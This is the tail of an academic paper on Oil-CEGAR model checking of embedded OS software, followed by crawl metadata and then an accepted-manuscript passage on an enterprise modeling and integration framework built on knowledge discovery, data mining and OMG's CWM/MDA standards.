process. These constructs are essential for an OS and must be explicitly modeled in C, resulting in higher complexity in verification. In addition, model-based verification performs property checking over infinite traces while code-based verification is typically limited to finite traces. In fact, we did try code-level model checking using CBMC and Yogar-CBMC on the same set of programs used in the experiments, by converting the OS model into the C language. Though code-level model checking was faster than Oil-CEGAR on small-scale programs such as TS1 and TS2, neither CBMC nor Yogar-CBMC were able to find any reachable state on TS3 within 26 hours, the longest Oil-CEGAR took to find each reachable control state. CBMC was able to determine that the lock state was reachable within 20 minutes only after we manually removed four tasks from Winlift and limited the number of alarm occurrences to five. B. Trace refinement vs. predicate refinement Oil-CEGAR uses trace refinement after identifying false alarms, instead of using typical predicate refinement as in SLAM or BLAST [17], because it is simpler to apply it to NuSMV models using constraints and invariants. The two approaches are orthogonal to each other, one refining predicates considering all execution paths and the other pruning infeasible traces considering all possible values of the predicate for a given trace. C. Scalability The use of a formal OS model in the refinement loop increases both verification accuracy and verification cost. The cost for checking complex embedded software with multiple alarms and ISRs is still very high, but, to the best of our knowledge, this is the first experiment showing high verification accuracy in this domain under such complexity. Improving the scalability of Oil-CEGAR is our next research goal. ACKNOWLEDGMENTS This research has been supported by the Basic Science Research Program through the National Research Foundation of Korea (NRF), funded by the Ministry of Education (NRF-2016R1D1A3B01011685), and by the Next-Generation Information Computing Development Program through the National Research Foundation of Korea (NRF), funded by the Ministry of Science, ICT (No. 2017M3C4A7068175). REFERENCES
{"Source-Url": "http://sselab.dothome.co.kr/wordpress/wp-content/uploads/2019/10/OiLCEGAR_preprint.pdf", "len_cl100k_base": 14121, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 50737, "total-output-tokens": 16373, "length": "2e13", "weborganizer": {"__label__adult": 0.00034332275390625, "__label__art_design": 0.00036835670471191406, "__label__crime_law": 0.00035643577575683594, "__label__education_jobs": 0.000637054443359375, "__label__entertainment": 5.9723854064941406e-05, "__label__fashion_beauty": 0.00015544891357421875, "__label__finance_business": 0.0002765655517578125, "__label__food_dining": 0.00030493736267089844, "__label__games": 0.0008931159973144531, "__label__hardware": 0.0022830963134765625, "__label__health": 0.00038695335388183594, "__label__history": 0.0002465248107910156, "__label__home_hobbies": 0.00011676549911499023, "__label__industrial": 0.0005116462707519531, "__label__literature": 0.00018870830535888672, "__label__politics": 0.00026917457580566406, "__label__religion": 0.0004222393035888672, "__label__science_tech": 0.039581298828125, "__label__social_life": 6.520748138427734e-05, "__label__software": 0.007110595703125, "__label__software_dev": 0.9443359375, "__label__sports_fitness": 0.0002799034118652344, "__label__transportation": 0.0008072853088378906, "__label__travel": 0.00019073486328125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 58914, 0.04003]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 58914, 0.31574]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 58914, 0.88253]], "google_gemma-3-12b-it_contains_pii": [[0, 5395, false], [5395, 10073, null], [10073, 15321, null], [15321, 20727, null], [20727, 24221, null], [24221, 29752, null], [29752, 36138, null], [36138, 39704, null], [39704, 44260, null], [44260, 49550, null], [49550, 54590, null], [54590, 58914, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5395, true], [5395, 10073, null], [10073, 15321, null], [15321, 20727, null], [20727, 24221, null], [24221, 29752, null], [29752, 36138, null], [36138, 39704, null], [39704, 44260, null], [44260, 49550, null], [49550, 54590, null], [54590, 58914, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 58914, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 58914, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 58914, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 58914, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 58914, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 58914, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 58914, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 58914, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 58914, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 58914, null]], "pdf_page_numbers": [[0, 5395, 1], [5395, 10073, 2], [10073, 15321, 3], [15321, 20727, 4], [20727, 24221, 5], [24221, 29752, 6], [29752, 36138, 7], [36138, 39704, 8], [39704, 44260, 9], [44260, 49550, 10], [49550, 54590, 11], [54590, 58914, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 58914, 0.11312]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
64738e3b6f5aee9d522c8e38cf01115d2a40c6f7
An enterprise modeling and integration framework based on knowledge discovery and data mining This item was submitted to Loughborough University's Institutional Repository by the/an author. Additional Information: - This article was accepted for publication in the journal International Journal of Production Research [(© Taylor and Francis). The definitive version is available at: http://dx.doi.org/10.1080/00207540412331322939 Metadata Record: https://dspace.lboro.ac.uk/2134/9804 Version: Accepted for publication Publisher: © Taylor and Francis Please cite the published version. This item was submitted to Loughborough’s Institutional Repository (https://dspace.lboro.ac.uk/) by the author and is made available under the following Creative Commons Licence conditions. ![Creative Commons License Image] **Attribution-NonCommercial-NoDerivs 2.5** You are free: - to copy, distribute, display, and perform the work **Under the following conditions:** - **Attribution.** You must attribute the work in the manner specified by the author or licensor. - **Noncommercial.** You may not use this work for commercial purposes. - **No Derivative Works.** You may not alter, transform, or build upon this work. - For any reuse or distribution, you must make clear to others the license terms of this work. - Any of these conditions can be waived if you get permission from the copyright holder. Your fair use and other rights are in no way affected by the above. This is a human-readable summary of the Legal Code (the full license). Disclaimer: ☰ For the full text of this licence, please go to: http://creativecommons.org/licenses/by-nc-nd/2.5/ An Enterprise Modeling and Integration Framework based on Knowledge Discovery and Data Mining Elena I. Neaga* and Jennifer A. Harding ** The paper deals with the conceptual design and development of an enterprise modeling and integration framework using knowledge discovery and data mining. First, the paper briefly presents the background and current state-of-the-art of knowledge discovery in databases and data mining systems and projects. Next, enterprise knowledge engineering is dealt with. The paper suggests a novel approach of utilizing existing enterprise reference architectures, integration and modeling frameworks by the introduction of new enterprise views such as mining and knowledge views. An extension and a generic exploration of the information view that already exists within some enterprise models, are also proposed. The Zachman Framework for Enterprise Architecture is also outlined against the existing architectures and the proposed enterprise framework. The main contribution of this paper is the identification and definition of a common knowledge enterprise model which represents an original combination between the previous projects on enterprise architectures and the Object Management Group (OMG) models and standards. The identified common knowledge enterprise model has therefore been designed using the OMG’s Model-Driven Architecture (MDA) and Common Warehouse MetaModel (CWM), and it also follows the RM-ODP (ISO/OSI). It has been partially implemented in Java™, Enterprise JavaBeans (EJB) and Corba/IDL. Finally, the advantages and limitations of the proposed enterprise model are outlined. 1. Introduction One of the foremost challenges facing manufacturing industry nowadays is the large-scale integration of their enterprise systems, along with their associated models, data, information, knowledge and web descriptions. To achieve a high level of integration of managerial and technical elements, companies are resorting to standard reference architectures and common enterprise models usually developed within international projects. On the other hand the enterprise systems generate large amounts of data which are a valuable asset and potentially an important source of new information and knowledge for improving the business of the enterprise, gaining competitive advantage in fierce markets and coping with changes and managerial complexity. Large organizations such as manufacturing companies could respond to changes and challenges in their business and production activities by using intensive and intelligent database processing to identify new trends and to predict and improve their business performance. Therefore knowledge discovery (KD) in databases is a promising solution and this paper is focused on using emerging knowledge technologies such as data mining for enterprise integration and modeling. However, a comprehensive and comparative review of literature related to knowledge discovery, data mining and enterprise integration and modeling approaches reveals that there is not any reported interdisciplinary research. This paper suggests that extending the existing enterprise modeling and integration architectures and environments to incorporate KD and data mining (DM) systems could significantly contribute to improving the decision making process and business performance. Therefore this paper mainly addresses the design and development of a framework for enterprise engineering which consider knowledge discovery in databases and data mining processing to be essential. One of the most important practical issues of the research reported in this paper is to include and accommodate a generic KD&DM system within the existing standardized and referenced enterprise architectures and models. In order to realize this issue in a systematic, effective and standard manner, the paper proposes introducing new views within the existing reference architectures for enterprise modeling and integration. Finally, a common knowledge enterprise model applied to extended enterprise is designed and partially developed. The most well-known enterprise architectures in the 1990s include CIM-OSA, ARIS, PERA and GERAM (ESPRIT 1993, Vernadat 1996, Rolstadas and Anderson 2000). However, research efforts have been especially devoted to looking for new architectures in order to accommodate the changing conditions, recent technical advances and requirements of new manufacturing paradigms such as agile, holonic, bionic, fractal and virtual. The research presented in this paper also considers the Reference Model of Open Distributed Processing (RM-ODP) which is an ISO coordinating framework to support the design of distributed systems in heterogeneous environments based on the standardization of open distributed processing (ISO/OSI 1995). The paper briefly presents in section 2, the background of knowledge discovery, data mining, related systems, projects, standards and modeling techniques. This paper is directed at defining, especially in section 3, an enterprise modeling and integration framework which intensively considers the previous enterprise engineering approaches and is based on knowledge discovery and data mining defined as emerging knowledge technologies. Generally, a framework is defined as a more general concept than an architecture including incomplete and general design and implementation roadmap or guidelines for a range of enterprise information systems. Hence, different architectures can be developed within a framework (Molina 1995, Vernadat 1996, Molina and Bell 2002, Neaga 2003). Within the framework described in this paper, a common knowledge enterprise model is identified and it is analyzed and modeled in section 4. This model is applied to the extended enterprise as shown in sub-section 4.3. The remainder of the paper includes in section 5, the development aspects, and in section 6 the advantages and the limits of the Common Knowledge Enterprise Model are presented. 2. Background of Knowledge Discovery and Data Mining Knowledge discovery (KD) and data mining (DM) are interdisciplinary areas directed at intelligently exploring large databases in order to find and use patterns, new information and knowledge. KD and DM incorporate complex algorithms from statistics and artificial intelligence, including imaginative and intuitive processing. Like other evolutionary systems, especially those based on neural networks, DM applications are tending to use both rational and emotional intelligence defined as affective intelligence (Adami 1998, Neaga 2003). The main DM techniques are On-Line Analytical Processing (OLAP) and methods based on classification, association rules, clustering, decision trees, sequential patterns, fuzzy logic and combinations of algorithms such as neural networks (NN) and case-base reasoning (CBR) (Fayyad et al. 1996, Ebecken 1998, Bramer 1999, Adamo 2001, Han and Kamber 2001, Klosgen and Zytkow 2002). It is also possible to consider DM more as a set of organized activities than as methods on their own because the main algorithms are employed from close areas such as statistics and/or artificial intelligence. Manufacturing enterprises rely on vast amounts of data and information that is located in large databases. This information is a valuable resource, but its value can be increased if additional knowledge can be gained from it. The exploration of database information, to identify and extract deep and hidden knowledge, is made possible by DM techniques (Ebecken 1998). The existing databases of manufacturing enterprises, or indeed of most large organizations, are huge, but largely untapped sources of information, since they contain valuable records of operational and market history. DM techniques can be used to improve strategic and operational planning activities, as databases can be explored to gain feedback on the past performance and business behaviour of the enterprise as shown in Neaga and Harding (2002) and Neaga (2003). Data warehouse is an optional stage in order to perform data mining and it efficiently and effectively collects and stores data from multiple, distributed and heterogeneous operational databases, organizes the data using the data mart concept, and keeps historical data for future analysis (Adriaans and Zantinge 1996, Harding and Yu 1999). 2.1 Overview of Data Mining Systems, Projects and Standards Nowadays the trends in DM are towards standardization of projects, using common methods and tools, and defining repeatable activities. CRISP-DM (Cross Industry Standard Process for Data Mining), SolEuNet (Data Mining and Decision Support for Business Competitiveness: A European Virtual Enterprise), Kensington Enterprise Data Mining (Imperial College, Department of Computing, London) and other projects have established methodologies and developed dedicated languages and software tools for KD and DM processing (SolEUNet 1999, Chapman et al. 1999, 2000, Helberg 2002). Predictive Model Markup Language (PMML) is a Data Mining Group (DMG) open standard format based on XML specification for exchanging mining models between applications running on different platforms. Common Warehouse Metamodel (CWM) is an OMG’s UML/XML-based specification for mining models defined as metadata (OMG 2000). However, these projects, dedicated languages and standards are not correlated with the enterprise modeling and integration projects and related standards for distributed manufacturing. Moreover, most DM products focus on the mining technology rather than on the ease-of-use, integration, scalability and portability. Neaga (2002, 2003) and Harding (2002) have recommended for manufacturing engineering applications, the use of PolyAnalyst system as well as the data mining source libraries such as Weka and ArMiner. 3. Enterprise Knowledge Engineering Approach The enterprise engineering approaches define generic modalities of modeling, analysis and design for several enterprise systems including information, manufacturing and business systems. These approaches usually include methodologies related to building and executing the models of an integrated and/or extended enterprise and related IT support systems. The reference architectures are useful for abstracting different views of the enterprise, specifying modelling approaches to emphasize enterprise properties and defining the life-cycle of the enterprise engineering activities. However, the reference architectures do not include how integration, collaboration and communication within an enterprise and/or extended enterprise are realized especially in the context of sharing data, information, knowledge and web models. For example, a model may show that an information flow between two functions is desirable for integrating a business process but it does not specify how to implement the integrated information flow (Giachetti, 2004). There are several enterprise modeling approaches and reference architectures such as CIM-OSA, ARIS, PERA, GRAI, TOVE and GERAM which constitute a common environment and methodology for complex system integration, comparative analysis, modeling design and re-design of a manufacturing enterprise using advanced software tools (ESPRIT 1993, Bernus et al. 1996, Fox 1996, Vernadat 1996, Edwards et al. 1998, Aguiar and Edwards 1999, Harding et al. 1999, Toh 1999a, b, Rolstadas and Anderson 2000, Wang et al. 2002, Shen et al. 2004). Consideration of these approaches, especially CIM-OSA, is justified in order to define a new enterprise model, because these reference architectures may already be used by some companies that may become part of an extended enterprise. Although current advanced and intelligent data exploration was not originally included within these early projects, they do create the basis to build a common enterprise model based on knowledge discovery and data mining. It can be argued that a reference architecture such as Computer Integrated Manufacturing – Open System Architecture(CIM-OSA) which is comprised of several main views, for example function, information, resource and organization views have been found to be sufficient for the building and execution of several particular enterprise models (Toh 1999a, b, Wang et al. 2002). The Architecture of Integrated Information Systems(ARIS) contains organization, function, data and control views (Scheer and Kruse 1994). Generally, the existing reference architectures do not include specific views in order to support advanced knowledge processing even though the fact that knowledge has different representations is considered. Aguiar and Edwards (1999) described knowledge capture for enterprise model building and knowledge manipulation for enterprise model execution. However, the associated Systems Engineering Workbench for Open Systems Architecture, SEW-OSA (ESPRIT 1993, Edwards et al. 1998, Aguiar and Edwards 1999) has not included advanced knowledge processing elements and/or sub-systems. Giachetti (2004) presents a detailed framework to review the information integration of the enterprise. He stated that the various information integration issues and supported systems and their relationships to each other have not been sufficiently investigated and defined. His article presents an enterprise information integration framework that aims to bridge parallel approaches towards integration so that the information integration requirements can be better globally understood and generic representation used. This framework has included ontology definitions and different knowledge exchange and communication languages. The data warehouse is considered only for data integration aspects because it provides a global data view for the purposes of analysis. However within the information integration framework presented by Giachetti (2004) the data view is not exploited further to gain information and knowledge as shown in the approach presented here, and this is especially related to the addition of new views to ARIS. The new information as well as the discovered knowledge constitutes a support for achieving a high level of enterprise integration, and extended enterprise communication and collaboration based on both reference architecture and knowledge modeling. Knowledge discovery and its advanced processing and maintenance should bring a considerable advantage for improving business performance and the flexibility of future manufacturing system design and re-engineering, and new product development and introduction. These issues have been approached and been demonstrated within several research projects related to information and knowledge modeling (Molina 1995, Harding 1996, Zhao et al. 1999, Dorador and Young 2000, Molina and Bell 2002). Wang et al. (2002) have introduced a few considerations about data sources integration and data warehouse, and Williams (1996) has defined the requirements for data shared between enterprise entities for PERA reference architecture. Insert figure 1 about here CIM-OSA includes function, information, resource and organization views which are described in details in (ESPRIT 1993, Bernus et al. 1996, Vernadat 1996, Toh 1999a, b, Wang et al. 2002). The number of views is not limited, and it can be expanded as necessary, but it is recommended that the number be kept to the minimum possible. The existing views enable designers and users to better understand and communicate the structure, purposes, capabilities, resources and relationships within the enterprise and a network of enterprises. However, they do not particularly support them to identify and extract knowledge that exists within the system mainly because they do not capture knowledge in a systematic and organized manner. Hence, different views of the enterprise, and of the extended enterprise are needed to enable efficient knowledge extraction through data mining. Therefore it is necessary to define the knowledge view as the description of processed information with an associated meaning, which leads to an action that adds value to the initial data. The extended CIM-OSA cube depicted in figure 1 defines the high level representation of an enterprise engineering modeling and integration framework based on knowledge discovery and data mining. The knowledge view facilitates enterprise modeling, integration, collaboration and coordination from the knowledge perspective. Also if enterprise modelling is considered as the process of building models of the whole or part of the enterprise such as process models, data models, resource models etc. based on knowledge about the enterprise, previous models and/or reference models as well as domain ontologies and model representation language (Vernadat 1996), then mining models are directed to logically fit or overlap with enterprise models, except that they are obtained by knowledge discovery. Descriptive enterprise models are widely used and usually are based on diagrams described in an Integrated Definition Language. (IDEF) based on the **Structured Analysis and Design Technique (SADT)** (Toh 1999b, Toh and Harding 1999, Dorador and Young 2000, Aguilar-Savén 2004, Shen et al. 2004). Generally these models describe the business processes across the enterprise and the related modeling and integration framework enables a common understanding and analysis of the business activities. These models can be complemented and improved with **mining descriptive models** describing patterns in existing data about an enterprise’s behaviour and past performances. The **mining predictive models** could be used to forecast enterprise model evolution and its future business behaviour as position on the market. These models may evaluate the initial enterprise model, its evolution during model execution and its achievement and forecast future business. Enterprise knowledge could be classified as follows: - Knowledge about the past which is stable, voluminous and accurate; - Knowledge about present which is unstable, compact and may be inaccurate; - Knowledge about the future which is hypothetical. Knowledge discovery and data mining are critical processes applied to existing enterprise databases in order to find new information, knowledge and patterns which show the future enterprise behaviour and improve its business performance. Besides because the mining models are based on enterprise application/systems they may cover a generic description for the business as well as production processes and product representations. Furthermore the knowledge view supports other areas of knowledge engineering and management, and it makes possible the distinction between tacit (implicit) and explicit knowledge (Polanyi 1966): - **Tacit knowledge**: implicit, mental models and experiences of individuals. - **Explicit knowledge**: formal models, rules and procedures. The conventional model to turn data into information and further into knowledge is defined as follows: \[ \text{data} \implies \text{information} \implies \text{knowledge} \implies \text{wisdom} \] However one of the main goals of data mining is to gain new information and knowledge from databases. Therefore data mining may process the information embedded in the information view and the new information, knowledge and patterns could be captured in the same views. In order to obtain a distinct separation, an additional view of the enterprise is suggested and this is called the mining view. The **mining view** should include the description of mining and new business, manufacturing and product models obtained through knowledge discovery, OLAP, data mining and other advanced data exploratory techniques. The **data view** represents the abstract level of all data manipulated by different software systems into an enterprise information system. Therefore a data view has to be considered at the level of enterprise architecture and the definition of a high level enterprise data architecture should significantly support data mining. The data view exists as part of ARIS and this has been used as a basis for the inclusion of additional views such as information, knowledge and mining views as depicted in figure 2. Insert figure 2 about here Generally, adding new views or extending the interpretation of existing views provides support for the development of applications based on knowledge and business intelligence solutions. However CIM-OSA, PERA, ARIS, GERAM etc. are high level and abstract reference architectures which do not offer implementation solutions especially for specific IT systems such as DM applications which process particular data stored in operational databases. It is therefore suggested that the implementation solutions should be based on an application view obtained through a unified perspective of an enterprise’s applications such as supply chain, enterprise resource planning, and customer relationship management systems and support advanced software tools such as SAP, I2 Technologies, Manugistics etc. (Neaga 2003). The identified enterprise model is based on the enterprise’s applications and their combination in order to demonstrate the application of KD&DM in several manufacturing and business areas. Moreover the OMG’s CWM, which has been employed to design the common knowledge enterprise model, provides a clear manner to be linked with a generic representation of enterprise applications. 3.1. Outline of Zachman Framework for Enterprise Architecture Zachman (1996, 1999) who is an internationally recognized expert on Enterprise Architecture and author of a Framework for Enterprise Architecture, defines a strong and logical connection between business processes, organization strategies and enterprise architectures. This approach also emphasizes that an enterprise must produce models in order to deliver systems implementations in the short-term and at the same time for the long-term, instantiate the architecture process in order to ensure on-going coherence of system implementations and to build an enterprise environment conducive to accommodating high rates of change. The Zachman Framework could also be defined as a conceptual methodology which shows how all of the specific architectures that an organization might define can be integrated into a comprehensive and coherent environment for enterprise systems. It is an analytic model or classification scheme that organizes descriptive representations. It does not describe an implementation process and is independent of specific guidelines (Frankel et al. 2003). In summary, this framework has the following characteristics (Zachmann 1996): a. Simplicity: it is easy to understand and it is not technical, but purely logical. In its most elementary form, it has three perspectives: Owner, Designer, Builder, and three abstractions: Material, Function, Geometry. Anybody (technical or non-technical) can understand it. b. Comprehension: it addresses the enterprise as a whole. Any issues can be mapped against it to understand where they fit within the context of the enterprise as a whole. c. Language supporting: it helps to think about complex concepts and communication of them precisely with few and non-technical terms. d. Planning Tool: it helps to make better choices about the enterprise planning and its objectives. It is possible to find the best alternative in the context of a complex business with a range of alternatives. e. Problem-Solving: it enables working with abstractions, to simplify and to isolate simple variables without losing sense of the complexity of the enterprise as a whole. f. Neutrality: it is defined totally independently of tools or methodologies and therefore any tool or any methodology can be mapped within the framework. Generally, compared to the Zachman framework any academic research project in the area of enterprise engineering is more complicated and in consequence there may be many limitations or restrictions in applying it for a specific enterprise. Furthermore the framework which also considers knowledge discovery and data mining becomes too restrictive and difficult to apply in practice, due to the many systems that are involved. The Zachman framework is very general and can oversimplify some enterprise issues such as its business performance and behaviour although it takes in consideration decision support systems, analytical processing and data exploration. However, the corresponding systems cannot be integrated industry-wide like the enterprise applications supported by the framework proposed within this paper. Generally, the expense of building a data warehouse in a given enterprise is substantial and may not be directed to a quick return on investment. Frankel et al. (2003) have elaborated a mapping methodology between the Zachman framework and Model-Driven Architecture (MDA) developed by OMG. The Common Warehouse MetaModel (CWM) defined at the heart of MDA is used to develop the common knowledge enterprise model as it is described in the next sections. 4. The Common Knowledge Enterprise Model 4.1 Introduction of Model-Driven Architecture and Common Warehouse MetaModel Model-Driven Architecture (MDA) is the latest OMG initiative, developed in order to support enterprises and organizations to integrate new applications into existing systems. MDA is a middleware and it acts as a high-level abstract architecture based on UML methodology and existing profiles. At the heart of MDA is the already defined Meta-Object Facility (MOF), CORBA, XMI/XML and Common Warehouse Metamodel (CWM) (OMG 2001). Common Warehouse MetaModel (CWM) (CWM) defines a generic model that enables data exchange and sharing across databases or even data warehouses across enterprises (OMG 2000, Poole et al. 2002, 2003). It is a new open industry standard recently adopted by some companies such as Oracle, SAS and others which are progressing towards incorporating this standard in their implementation. CWM is also a common metamodel which should be independent of any specific data warehouse implementation, but which becomes domain specific in association with domain specifications such the common knowledge enterprise model presented in this paper. The metamodel is developing as a set of packages which describes metadata. Metadata is defined as data describing data or information about data, and generally, it comprises a description of information structures and models (Poole et al. 2002, 2003). Using the CWM supported by MDA, an identified common knowledge enterprise model has been modeled and designed. This phase has been done using UML implemented in Rational Rose Enterprise Edition (Rational Co. 2000). 4.2 Enterprise Model Description The enterprise modeling and integration framework based on knowledge discovery and data mining which is shown in figure 3 provides the design, development and implementation of a common knowledge enterprise model. Figure 3 illustrates that the enterprise framework defines a unified environment for integration of knowledge discovery and data mining systems such as PolyAnalyst™, Clementine etc. and source libraries of programmes such as Weka, ArMiner etc. with enterprise systems such as SAP, I2 Technologies, PeopleSoft, JD Edwards etc. The framework conforms to existing reference architectures for enterprise modeling and integration and it is based on OMG middleware definitions such as Common Warehouse MetaModel(CWM) and Model-Driven Architecture(MDA). The identified common knowledge enterprise model intensively exploits previous projects, models, standards and methodologies in both areas of enterprise engineering and data mining. The identified common knowledge enterprise model has been designed using the OMG’s CWM described in UML and the structure of the main model is shown in figure 4. The model depicted in figure 4 is a combination of a main model called CWM-DM (OMG 2000) and the enterprise information models produced by the enterprise reference architectures and models previously described in section 3. Therefore an identified common knowledge enterprise model consists of a MiningModel having at the heart MiningSettings, ApplicationInputSpecification, which specifies the enterprise applications and systems. MiningModelResult represents the generated model that is output for the mining activities. The class SupervisedMiningModel extends MiningModel to include supervised learning such as classification and regression. Hence, this class requires a TargetAttribute which provides the correspondance between ApplicationAttribute and the obtained SupervisedMiningModel. Supervised learning is applied to a data set which describes an Application identified by ApplicationInputSpecification and ApplicationAttribute, to obtain this model. The attribute function of MiningModel describes the DM function class (i.e. AssociationRules) whereas the attribute algorithms are used to specify the concrete algorithm (i.e. decisionTree). This model also contains classes corresponding to the employed algorithms and learning techniques such as (OMG 2000, Poole et al. 2002, 2003): - **StatisticsMiningModel**: statistical models; - **AssociationRulesMiningModel**: association rule models; - **SequentialMiningModel**: sequential analysis models; - **SupervisedMiningModel** for supervised learning models; - **ClusteringMiningModel**: clustering models. **EE_ApplicationSpecification** Class describes the classes representing enterprise applications or combinations of these. This part of the model is not part of OMG’s CWM but the link at the level of application modeling provides a high level of integration of different applications. This class incorporates Customer Relationship Management (CRM) Class, Supply Chain (SCM) Class, Enterprise Resource Planning (ERP) Class, product, manufacturing and marketing models usually described using a Product Data Management (PDM) system. **EE_ApplicationSpecification class** has also the role of eliminating the redundant information which could appear in the classes describing the enterprise systems and applications. Using a one to one multiplicity link the class ApplicationInputSpecification defines the set of input attributes for the mining model that are further used for enterprise modeling and integration and/or inter-enterprise communication in an extended enterprise. The common knowledge enterprise model supports the development of standard collaborative information systems which are also platform-independent. Furthermore this paper demonstrates that if an information system follows reference architectures and models and also uses OMG standards such as UML, CORBA and MDA then standard information systems can be incorporated in its design, and can be flexibly integrated within the enterprise reference architectures. This model also allows standard knowledge discovery and data mining applications to be developed which adhere to RM-ODP framework as well as to DM standards developed by OMG and Data Mining Group (Neaga 2003). ### 4.3 Application of the model for extended enterprise **Extended enterprise** is defined as a long-term co-operation and partnership based on information and knowledge exchange (Szegohe 1999) and the co-ordination of the manufacturing activities of collaborating independent enterprises and related suppliers (Jagdev and Browne 1998). The extended enterprise intensively uses communication and collaboration between manufacturing enterprises, and aims to achieve competitive advantage (Vernadat 1996, Harding et al. 1999, Szegheo 1999). **Virtual Enterprise** is the temporary alliance between enterprise systems using Internet and intranet technologies (Szegohe 1999). Jagdev and Browne (1998) and Zhang and Browne (1999) have comprehensively and comparatively analysed the extended and virtual enterprise issues and their associated concepts and paradigms. The model suggested is based on business processes modeling and integration (Shen et al. 2004) Global competition and distributed resources make it necessary for the extended enterprise to create and use a framework that enables the association of product development, supply chain management activities and manufacturing strategies. The application of the common knowledge model to the extended enterprise is directed at solving the above issue. For the extended enterprise, a non-overlapping combination of enterprise systems and applications is assumed, such as a supply chain management (SCM) system, a customer relationship management (CRM) system and an enterprise resource planning (ERP) system which may also support the business processes. For example a particular company may focus on implementing an ERP system, whilst others concentrate on SCM, CRM and other enterprise systems. The non-overlapping combination of enterprise systems represents the logical integration of dissimilar and complex applications which run in the same environment as the extended enterprise. Generally, these applications support different processes such as business and production and the relation between suppliers and customers within the extended enterprise. However these systems may generate redundant and identical data which needs to be pre-processed or aggregated in a data warehouse. Also some companies, particularly those with technical products may use Product Data Management (PDM) applications in order to improve their supply chains because a collaborative PDM system has the capabilities not only to define product components but also to share this design information along the supply chain. In the same manner as for a company running an individual business, an extended enterprise could consider the strategies which are of vital importance in order to achieve its business objectives (Platts and Gregory 1991, Storey 1994, Wang and Bell 1994). Also a competitive strategy involves using business analysis to maximize the value and capabilities that distinguish an organization from its competitors (Porter 1980, 1998). Shen et al. (2004) have suggested a framework based on business processes modeling and integration across companies and units which may be part of an extended enterprise. This approach provides data and information flow descriptions. However there is not any specification regarding the huge amounts of data generated by applications and accumulated by databases which could be further explored. In order to formulate and include the strategies for an extended enterprise it is necessary to define its objectives which may include aspects of quality, delivery, cost, flexibility and innovation as short-term objectives as well as long-term objectives. Therefore the common knowledge enterprise model has been completed with The Extended Enterprise Strategies and The Generic Product Data classes. The Extended Enterprise Strategies class and its associated sub-classes which link strategic management and operations are presented in figure 5. These classes logically describe several concepts such as JIT (Just-in-time) and TQM (Total Quality Management), LP (Lean Production), MRPII (Manufacturing Resource Planning), ERP (Enterprise Resource Planning), FMS (Flexible Manufacturing Systems) etc. which capture the changes in the global economy and competitive market places. The GenericProductData class and its sub-classes presented in figure 6 describe the following items (Harding 1996, Dorador and Young 2000, Wortmann et al. 2001): - CAD geometrical product model including feature-oriented product description; - STEP (Standard for the Exchange of Product Model Data) and Express product neutral model class which describes the neutral data format for the representation and exchange of product data; - Product Data Management (PDM) representation. 5. Development Issues From the IT perspective an integrating infrastructure is a set of common services and functions available as middleware to all applications on different platforms of a distributed system (Vernadat 1996). Object Management Group (OMG) has developed Common Object Request Broker Architecture (CORBA) and the associated language Interface Definition Language (IDL) (Orfali et al. 1997, Orfali and Harkey 1998), and most recently Model-Driven Architecture (MDA) and Common Warehouse MetaModel (CWM). The defined classes of a prototype system have been generated and transferred in Oracle - JDeveloper which is Oracle's Java development tool for building, debugging and deploying Internet applications. Java source generation is based on the component specification rather than on the class specification. In order to realize Java source code, after diagrams for classes have been created, every class is assigned a valid Java component. In practice the following methods have been used (Rational Co. 2000): 1. Generating Java source from Class Diagram; 2. Generating Java source from a Component Diagram. JDeveloper V3.2 includes Java Data Base Connectivity (JDBC) capability for an Oracle database, and automatic generation of Corba interfaces. It also includes Oracle Business Components for Java, Extensible Markup Language (XML), powered application component framework that significantly simplifies the development, deployment and customization of multi-tier Java applications for the Internet. Furthermore Enterprise JavaBeans (EJB) offer the possibility to develop reusable enterprise components which include knowledge discovery and data mining components. Some Application Programming Interfaces (API) have been proposed and these have the aim of making dissimilar software systems run in the same environment. In order to leverage legacy databases, existing applications and data mining systems, a set of CORBA/IDL has been generated. Neaga (2003) includes some details about the implementation and the development of object wrappers using CORBA/IDL. 6. Advantages and Limits of the Common Knowledge Enterprise Model The main advantages of the enterprise integration and modeling framework and of the common knowledge enterprise model described in this paper are as follows: - The inclusion within the high level enterprise referenced architectures and models of the knowledge and mining views which provide a good potential to perform intelligent data exploration such as data mining on enterprise databases. Knowledge Discovery in Databases and data mining could significantly contribute to the improvement of the business performance of an enterprise, and facilitate the re-engineering and re-design of manufacturing systems as well as new product introduction, design and manufacture. - Definition of a unified object-oriented framework for manufacturing, product, mining and knowledge models and associated support systems based on OMG’s MDA and CWM. - The identification of a common knowledge enterprise model which is fully designed using a new standard developed by OMG for data warehouse and mining as the CWM. - The identified enterprise model has been partially implemented in Java™, Enterprise JavaBeans (EJB) and Corba/IDL. - The possibilities of mapping the identified enterprise model to standards and enterprise generic models obtained based on Zachman framework and RM-ODP. However, the approach presented in this paper has the following limitations: - The combination of several systems which individually satisfy particular requirements may not provide the best overall solution (Toh and Harding 1999). The common knowledge enterprise model supported by an enterprise framework based on knowledge discovery has not included any selection methodologies of software systems as suggested by Toh and Harding (1999). - Enterprise Resource Planning (ERP) software is the dominant strategic platform for supporting enterprise-wide business processes. However, it has been criticised for being inflexible and not meeting specific organisation and industry requirements. An alternative 